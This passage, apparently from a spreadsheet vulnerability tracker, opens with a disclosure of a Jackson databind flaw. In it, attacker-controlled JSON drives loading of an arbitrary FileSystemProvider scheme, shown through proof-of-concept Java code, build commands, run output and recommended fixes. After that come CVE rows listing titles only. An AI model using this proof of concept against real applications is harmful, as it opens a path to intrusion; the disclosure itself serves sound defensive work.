**PoC 2 — scheme-selection mechanism demo (custom `FileSystemProvider`).**
A third-party provider (scheme `evilscheme`) registered via `META-INF/services/java.nio.file.spi.FileSystemProvider`, which is standing in for *any* provider a real application ships. 
`com/poc/EvilFileSystemProvider.java`:
```java
package com.poc;
import java.nio.file.*;
import java.nio.file.spi.FileSystemProvider;
import java.nio.file.attribute.*;
import java.net.URI;
import java.io.IOException;
import java.util.*;
import java.util.Set;
import java.nio.channels.SeekableByteChannel;
/**
 * A custom java.nio.file.spi.FileSystemProvider registered via META-INF/services, using the
 * scheme "evilscheme". It stands in for ANY third-party FileSystemProvider present on a real
 * application's classpath. Its static initializer and getPath() record that they executed,
 * proving that attacker-controlled JSON drove provider class loading + provider.getPath(uri)
 * inside jackson's readValue.
 */
public class EvilFileSystemProvider extends FileSystemProvider {
    public static volatile boolean STATIC_INIT_RAN = false;
    public static volatile String GET_PATH_URI = null;
    static { STATIC_INIT_RAN = true; }
    @Override public String getScheme() { return "evilscheme"; }
    @Override public Path getPath(URI uri) {
        GET_PATH_URI = uri.toString();
        System.out.println("&gt;&gt;&gt; [EVIL-PROVIDER] getPath() invoked with attacker URI: " + uri);
        // A malicious/vulnerable provider could here open a socket, read a file, mount a FS, etc.
        return java.nio.file.Path.of(System.getProperty("java.io.tmpdir"), "evilprovider-marker");
    }
    // --- remaining abstract methods: minimal stubs ---
    @Override public FileSystem newFileSystem(URI uri, Map&lt;String,?&gt; env) { throw new UnsupportedOperationException(); }
    @Override public FileSystem getFileSystem(URI uri) { throw new FileSystemNotFoundException(); }
    @Override public SeekableByteChannel newByteChannel(Path p, Set&lt;? extends OpenOption&gt; o, FileAttribute&lt;?&gt;... a) throws IOException { throw new UnsupportedOperationException(); }
    @Override public DirectoryStream&lt;Path&gt; newDirectoryStream(Path d, DirectoryStream.Filter&lt;? super Path&gt; f) { throw new UnsupportedOperationException(); }
    @Override public void createDirectory(Path d, FileAttribute&lt;?&gt;... a) { throw new UnsupportedOperationException(); }
    @Override public void delete(Path p) { throw new UnsupportedOperationException(); }
    @Override public void copy(Path s, Path t, CopyOption... o) { throw new UnsupportedOperationException(); }
    @Override public void move(Path s, Path t, CopyOption... o) { throw new UnsupportedOperationException(); }
    @Override public boolean isSameFile(Path p, Path p2) { return false; }
    @Override public boolean isHidden(Path p) { return false; }
    @Override public FileStore getFileStore(Path p) { throw new UnsupportedOperationException(); }
    @Override public void checkAccess(Path p, AccessMode... m) { }
    @Override public &lt;V extends FileAttributeView&gt; V getFileAttributeView(Path p, Class&lt;V&gt; t, LinkOption... o) { return null; }
    @Override public &lt;A extends BasicFileAttributes&gt; A readAttributes(Path p, Class&lt;A&gt; t, LinkOption... o) { throw new UnsupportedOperationException(); }
    @Override public Map&lt;String,Object&gt; readAttributes(Path p, String a, LinkOption... o) { throw new UnsupportedOperationException(); }
    @Override public void setAttribute(Path p, String a, Object v, LinkOption... o) { }
}
```
Registration descriptor —
`src/main/resources/META-INF/services/java.nio.file.spi.FileSystemProvider`:
```
com.poc.EvilFileSystemProvider
```
Driver — `com/poc/Vuln04b_PathProviderMount.java`:
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
/**
 * Vuln 4 (end-to-end terminal effect): a third-party FileSystemProvider registered via
 * META-INF/services (scheme "evilscheme") stands in for any provider on a real app's
 * classpath. Attacker JSON with that scheme drives jackson's ServiceLoader fallback to
 * (1) load the provider class (running its static initializer) and (2) invoke
 * provider.getPath(attackerUri) -- all inside readValue, with NO application code.
 */
public class Vuln04b_PathProviderMount {
    public static class Config { public java.nio.file.Path workdir; }
    public static void main(String[] args) throws Exception {
        System.out.println("Provider static-init ran before deserialization? " + EvilFileSystemProvider.STATIC_INIT_RAN);
        ObjectMapper mapper = JsonMapper.builder().build();   // default config
        String json = "{\"workdir\":\"evilscheme://attacker-controlled/target?x=1\"}";
        System.out.println("Deserializing (default mapper): " + json);
        Config c = mapper.readValue(json, Config.class);
        System.out.println("Resolved Path = " + c.workdir);
        System.out.println("Provider static-init ran: " + EvilFileSystemProvider.STATIC_INIT_RAN);
        System.out.println("Provider.getPath() attacker URI: " + EvilFileSystemProvider.GET_PATH_URI);
        boolean ok = EvilFileSystemProvider.GET_PATH_URI != null
                &amp;&amp; EvilFileSystemProvider.GET_PATH_URI.contains("attacker-controlled");
        System.out.println(ok
            ? "RESULT: VULNERABLE - attacker JSON drove ServiceLoader provider load + provider.getPath(attackerUri) inside readValue (terminal effect proven)"
            : "RESULT: NOT reproduced");
    }
}
```
## Execution Steps
The PoCs need only the three Jackson 3.2.1 jars on the classpath and can be built with plain `javac`/`java` . PoC 2 additionally requires the `META-INF/services` descriptor to be on the **runtime** classpath
```bash
# 0. Locate the three published dependency jars.
M2="$HOME/.m2/repository"
DB="$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar"
CORE="$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar"
ANN="$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar"
CP="$DB:$CORE:$ANN"
# 1. Compile the three sources.
cd poc-project
mkdir -p out
javac -cp "$CP" -d out \
  src/main/java/com/poc/EvilFileSystemProvider.java \
  src/main/java/com/poc/Vuln04_PathProvider.java \
  src/main/java/com/poc/Vuln04b_PathProviderMount.java
# 2. Put the ServiceLoader descriptor on the runtime classpath (needed by PoC 2).
mkdir -p out/META-INF/services
cp src/main/resources/META-INF/services/java.nio.file.spi.FileSystemProvider \
   out/META-INF/services/java.nio.file.spi.FileSystemProvider
# 3. Run both PoCs.
java -cp "out:$CP" com.poc.Vuln04_PathProvider        # PoC 1
java -cp "out:$CP" com.poc.Vuln04b_PathProviderMount  # PoC 2
```
## Reproduction Evidence
Executed against jackson-databind 3.2.1 (OpenJDK 25).
**PoC 1 :**
```
Deserializing (default mapper): {"workdir":"jar:file:/tmp/jackson_poc_evil.zip!/x"}
Throwable during resolution: tools.jackson.databind.exc.ValueInstantiationException: Cannot construct instance of `java.nio.file.Path`, problem: `java.nio.file.FileSystemNotFoundException`
 at [Source: REDACTED (`StreamReadFeature.INCLUDE_SOURCE_IN_LOCATION` disabled); byte offset: #UNKNOWN] (through reference chain: com.poc.Vuln04_PathProvider$Config["workdir"])
RESULT: VULNERABLE (attacker URI drove provider resolution; threw ValueInstantiationException inside readValue)
```
Notes: the JDK **built-in** `jar` provider's `getPath` does not auto-mount (it also throws `FileSystemNotFoundException`, since only `newFileSystem` mounts). PoC 1 proves the in-scope defect: attacker input reaches the scheme-driven `ServiceLoader` resolution during `readValue` with no allow-list. PoC 2 only illustrates the downstream mechanism.
**PoC 2  :**
```
Provider static-init ran before deserialization? true
Deserializing (default mapper): {"workdir":"evilscheme://attacker-controlled/target?x=1"}
&gt;&gt;&gt; [EVIL-PROVIDER] getPath() invoked with attacker URI: evilscheme://attacker-controlled/target?x=1
Resolved Path = /var/folders/.../T/evilprovider-marker
Provider static-init ran: true
Provider.getPath() attacker URI: evilscheme://attacker-controlled/target?x=1
RESULT: VULNERABLE - attacker JSON drove ServiceLoader provider load + provider.getPath(attackerUri) inside readValue (terminal effect proven)
```
Purely from a JSON string, jackson's `ServiceLoader` fallback selected the attacker-named scheme's provider and invoked `provider.getPath(uri)` with the full attacker URI inside `readValue`. Whether a given provider then does anything harmful is outside the library's control; the in-scope issue is the absence of a scheme restriction before this fallback runs.
## Impact
Untrusted JSON drives `provider.getPath(attackerURI)` on an attacker-chosen provider during `readValue`. With only the JDK built-in providers this is inert. Real impact requires a side-effecting third-party provider on the classpath. The fix is to close the
scheme-restriction gap.
## Recommended Fix
1. **Restrict the resolved scheme to a fixed, hard-coded set** ; reject `jar:` and other schemes via `ctxt.handleWeirdStringValue(...)`. A hard-coded set keeps the fix backport-safe with no new configuration surface.
2. **Skip the `ServiceLoader&lt;FileSystemProvider&gt;` enumeration for disallowed schemes**, so untrusted JSON cannot select and drive an arbitrary registered provider.
3. Document that `java.nio.file.Path`-typed fields should not be bound from untrusted JSON.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19032</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32599</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr"/>
      <c r="F11" s="5" t="inlineStr"/>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/gravitl/netmaker</t>
        </is>
      </c>
      <c r="M11" s="5" t="inlineStr">
        <is>
          <t>1.5.0</t>
        </is>
      </c>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr"/>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Netmaker has a boolean‑based SQL Injection in github.com/gravitl/netmaker</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32599</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42127</t>
        </is>
      </c>
      <c r="D12" s="5" t="inlineStr"/>
      <c r="E12" s="5" t="inlineStr"/>
      <c r="F12" s="5" t="inlineStr"/>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr"/>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Grafana: Pre-authentication denial of service in the public dashboard query handler in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42127</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42129</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr"/>
      <c r="E13" s="5" t="inlineStr"/>
      <c r="F13" s="5" t="inlineStr"/>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr"/>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>Grafana Loki datasource plugin's callResource handler contains a path traversal vulnerability. in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42129</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5139</t>
        </is>
      </c>
      <c r="D14" s="5" t="inlineStr"/>
      <c r="E14" s="5" t="inlineStr"/>
      <c r="F14" s="5" t="inlineStr"/>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M14" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr"/>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't enforce administrator authorization on the {{setDefaultInstance}} call within the {{/gitlab connect}} command handler in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5139</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58197</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr"/>
      <c r="E15" s="5" t="inlineStr"/>
      <c r="F15" s="5" t="inlineStr"/>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/stacklok/toolhive</t>
        </is>
      </c>
      <c r="M15" s="5" t="inlineStr">
        <is>
          <t>0.30.1</t>
        </is>
      </c>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr"/>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>ToolHive: containerized MCP servers can reach host services via host.docker.internal, enabling lateral movement in github.com/stacklok/toolhive</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58197</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6062</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr"/>
      <c r="E16" s="5" t="inlineStr"/>
      <c r="F16" s="5" t="inlineStr"/>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M16" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr"/>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't validate channel ownership of an existing subscription before applying edits in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6062</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61554</t>
        </is>
      </c>
      <c r="D17" s="5" t="inlineStr"/>
      <c r="E17" s="5" t="inlineStr"/>
      <c r="F17" s="5" t="inlineStr"/>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/jm33-m0/emp3r0r/core</t>
        </is>
      </c>
      <c r="M17" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260531142011-aed3d81641ab</t>
        </is>
      </c>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr"/>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>emp3r0r has an unauthenticated HTTP Polling DoS in github.com/jm33-m0/emp3r0r/core</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61554</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61628</t>
        </is>
      </c>
      <c r="D18" s="5" t="inlineStr"/>
      <c r="E18" s="5" t="inlineStr"/>
      <c r="F18" s="5" t="inlineStr"/>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>github, nginx, go, gin</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr"/>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>nginx ignition has Unauthenticated Admin Account Creation via Onboarding Race Condition in github.com/lucasdillmann/nginx-ignition.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github.com/lucasdillmann/nginx-ignition before v0.0.0-20260621194639-0586b4e55ab.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61628</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61629</t>
        </is>
      </c>
      <c r="D19" s="5" t="inlineStr"/>
      <c r="E19" s="5" t="inlineStr"/>
      <c r="F19" s="5" t="inlineStr"/>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>github, nginx, go, gin</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="M19" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260526022344-0c988fc1277c</t>
        </is>
      </c>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr"/>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>nginx ignition has ParseAcceptLanguage `_` separator bypass that enables ~75x CPU amplification via Accept-Language header in i18nMiddleware in github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61629</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61630</t>
        </is>
      </c>
      <c r="D20" s="5" t="inlineStr"/>
      <c r="E20" s="5" t="inlineStr"/>
      <c r="F20" s="5" t="inlineStr"/>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>github, nginx, go, gin</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="M20" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260328015550-8d35e1eb5dd6</t>
        </is>
      </c>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr"/>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>nginx ignition has TOTP Reuse During Validity Window in github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61630</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61672</t>
        </is>
      </c>
      <c r="D21" s="5" t="inlineStr"/>
      <c r="E21" s="5" t="inlineStr"/>
      <c r="F21" s="5" t="inlineStr"/>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="M21" s="5" t="inlineStr">
        <is>
          <t>0.13.7</t>
        </is>
      </c>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr"/>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>Capsule: Tenant owner bypasses Capsule's forbidden namespace/service/node label and annotation enforcement in github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61672</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61682</t>
        </is>
      </c>
      <c r="D22" s="5" t="inlineStr"/>
      <c r="E22" s="5" t="inlineStr"/>
      <c r="F22" s="5" t="inlineStr"/>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/kcp-dev/kcp</t>
        </is>
      </c>
      <c r="M22" s="5" t="inlineStr">
        <is>
          <t>0.31.4, 0.32.2</t>
        </is>
      </c>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr"/>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>kcp front-proxy does not strip inbound X-Remote-* identity headers, allowing any authenticated client to inject groups/warrants and impersonate system:masters in any workspace in github.com/kcp-dev/kcp</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61682</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61687</t>
        </is>
      </c>
      <c r="D23" s="5" t="inlineStr"/>
      <c r="E23" s="5" t="inlineStr"/>
      <c r="F23" s="5" t="inlineStr"/>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/hatchet-dev/hatchet</t>
        </is>
      </c>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
